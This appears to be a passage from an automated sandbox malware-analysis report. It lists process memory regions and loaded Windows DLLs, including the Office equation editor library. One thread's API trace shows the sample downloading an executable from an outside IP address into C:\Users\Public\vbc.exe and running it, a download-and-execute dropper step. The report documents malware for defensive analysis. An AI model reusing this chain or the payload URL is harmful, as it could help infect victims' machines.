Region: id = 813 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 814 start_va = 0xc50000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 815 start_va = 0x2050000 end_va = 0x2386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 816 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 817 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 818 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 819 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 820 start_va = 0x640000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 821 start_va = 0x640000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 822 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 823 start_va = 0x2390000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 824 start_va = 0x698f0000 end_va = 0x69c78fff monitored = 0 entry_point = 0x6998cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 825 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 826 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 827 start_va = 0x6f4a0000 end_va = 0x6f6aefff monitored = 0 entry_point = 0x6f54b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 828 start_va = 0x560000 end_va = 0x560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 829 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 830 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 831 start_va = 0x70970000 end_va = 0x709e4fff monitored = 0 entry_point = 0x709a9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 832 start_va = 0x2790000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 833 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 834 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 835 start_va = 0x5a0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 836 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 837 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 838 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 839 start_va = 0x7d0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 840 start_va = 0x2790000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 841 start_va = 0x2930000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 842 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 843 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 844 start_va = 0x2890000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 845 start_va = 0x2a40000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 846 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 847 start_va = 0x580000 end_va = 0x584fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 848 start_va = 0x5e0000 end_va = 0x5e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 849 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 850 start_va = 0x600000 end_va = 0x60ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 851 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 852 start_va = 0x2bc0000 end_va = 0x2c7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 853 start_va = 0x620000 end_va = 0x623fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 854 start_va = 0x6f3d0000 end_va = 0x6f3ecfff monitored = 0 entry_point = 0x6f3d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 855 start_va = 0x740000 end_va = 0x743fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 856 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 857 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 858 start_va = 0x2c80000 end_va = 0x3171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 859 start_va = 0x3180000 end_va = 0x41bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 860 start_va = 0x810000 end_va = 0x814fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 861 start_va = 0x41c0000 end_va = 0x51e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 873 start_va = 0x70ce0000 end_va = 0x70e5dfff monitored = 0 entry_point = 0x70d5c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 874 start_va = 0x72420000 end_va = 0x726eafff monitored = 0 entry_point = 0x7265c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 875 start_va = 0x820000 end_va = 0x826fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 876 start_va = 0x70ad0000 end_va = 0x70cdcfff monitored = 0 entry_point = 0x70bbacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 877 start_va = 0x28d0000 end_va = 0x28d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 878 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 879 start_va = 0x70aa0000 end_va = 0x70ab1fff monitored = 0 entry_point = 0x70aa4510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 880 start_va = 0x722a0000 end_va = 0x722cefff monitored = 0 entry_point = 0x722abb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 881 start_va = 0x51f0000 end_va = 0x52effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 882 start_va = 0x70a00000 end_va = 0x70a9afff monitored = 0 entry_point = 0x70a3f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 883 start_va = 0x28e0000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 884 start_va = 0x2920000 end_va = 0x2920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 885 start_va = 0x52f0000 end_va = 0x53effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 886 start_va = 0x723a0000 end_va = 0x723eefff monitored = 0 entry_point = 0x723ad850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 887 start_va = 0x749e0000 end_va = 0x749e6fff monitored = 0 entry_point = 0x749e1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 888 start_va = 0x709f0000 end_va = 0x709f7fff monitored = 0 entry_point = 0x709f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 889 start_va = 0x722d0000 end_va = 0x72353fff monitored = 0 entry_point = 0x722f6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 890 start_va = 0x53f0000 end_va = 0x542ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 891 start_va = 0x5430000 end_va = 0x552ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 1043 start_va = 0x5530000 end_va = 0x556ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 1044 start_va = 0x5570000 end_va = 0x566ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005570000" filename = "" Region: id = 1045 start_va = 0x5670000 end_va = 0x567ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005670000" filename = "" Region: id = 1046 start_va = 0x5680000 end_va = 0x5a7afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005680000" filename = "" Region: id = 1047 start_va = 0x5a80000 end_va = 0x5a90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1048 start_va = 0x5aa0000 end_va = 0x5adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005aa0000" filename = "" Region: id = 1049 start_va = 0x5ae0000 end_va = 0x5bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ae0000" filename = "" Region: id = 1050 start_va = 0x72850000 end_va = 0x7299afff monitored = 0 entry_point = 0x728b1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1051 start_va = 0x5be0000 end_va = 0x5be3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1052 start_va = 0x5bf0000 end_va = 0x5c34fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1053 start_va = 0x5c40000 end_va = 0x5c43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1054 start_va = 0x5c50000 end_va = 0x5cddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1055 start_va = 0x5ce0000 end_va = 0x5ce3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ce0000" filename = "" Region: id = 1056 start_va = 0x5cf0000 end_va = 0x5cf3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1057 start_va = 0x5d00000 end_va = 0x5d12fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 1058 start_va = 0x5d20000 end_va = 0x5d20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d20000" filename = "" Region: id = 1059 start_va = 0x5cf0000 end_va = 0x5cf7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 1060 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1077 start_va = 0x5d30000 end_va = 0x5d78fff monitored = 1 entry_point = 0x5d33225 region_type = mapped_file name = "vbc.exe" filename = "\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe") Region: id = 1078 start_va = 0x67e00000 end_va = 0x67e0bfff monitored = 0 entry_point = 0x67e04ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 1079 start_va = 0x67ea0000 end_va = 0x67eb5fff monitored = 0 entry_point = 0x67ea21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 29 os_tid = 0x1118 [0156.452] GetProcAddress (hModule=0x74f30000, lpProcName="ExpandEnvironmentStringsW") returned 0x74f4cd50 [0156.452] ExpandEnvironmentStringsW (in: lpSrc="%PUBLIC%\\vbc.exe", lpDst=0x19eda4, nSize=0x104 | out: lpDst="C:\\Users\\Public\\vbc.exe") returned 0x18 [0156.452] LoadLibraryW (lpLibFileName="UrlMon") returned 0x70ce0000 [0156.471] GetProcAddress (hModule=0x70ce0000, lpProcName="URLDownloadToFileW") returned 0x70d5b240 [0156.471] URLDownloadToFileW (param_1=0x0, param_2="http://198.46.132.195/windowSSH/.win32.exe", param_3="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0165.595] LoadLibraryW (lpLibFileName="shell32") returned 0x75690000 [0165.595] GetProcAddress (hModule=0x75690000, lpProcName="ShellExecuteExW") returned 0x7582e690 [0165.596] ShellExecuteExW (in: pExecInfo=0x19efc8*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\Public\\vbc.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19efc8*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\Public\\vbc.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0167.194] GetProcAddress (hModule=0x74f30000, lpProcName="ExitProcess") returned 0x74f57b30 [0167.194] ExitProcess (uExitCode=0x0) Thread: id = 30 os_tid = 0x113c Thread: id = 31 os_tid = 0x9c4 Thread: id = 32 os_tid = 0x116c Thread: id = 33 os_tid = 0x1120 Thread: id = 34 os_tid = 0x13f0 Thread: id = 35 os_tid = 0xe40 Thread: id = 36 os_tid = 0xb4c Thread: id = 44 os_tid = 0x71c Thread: id = 45 os_tid = 0xb2c Process: id = "3" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x76ed000" os_pid = "0xb60" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x270" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 892 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 893 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 894 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 895 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 896 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 897 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 898 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 899 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 900 start_va = 0x190000 end_va = 0x196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 901 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 902 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 903 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 904 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 905 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 906 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 907 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 908 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 909 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 910 start_va = 0x4d0000 end_va = 0x4d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 911 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 912 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 913 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 914 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 915 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 916 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 917 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 918 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 919 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 920 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 921 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 922 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 923 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 924 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = mapped_file 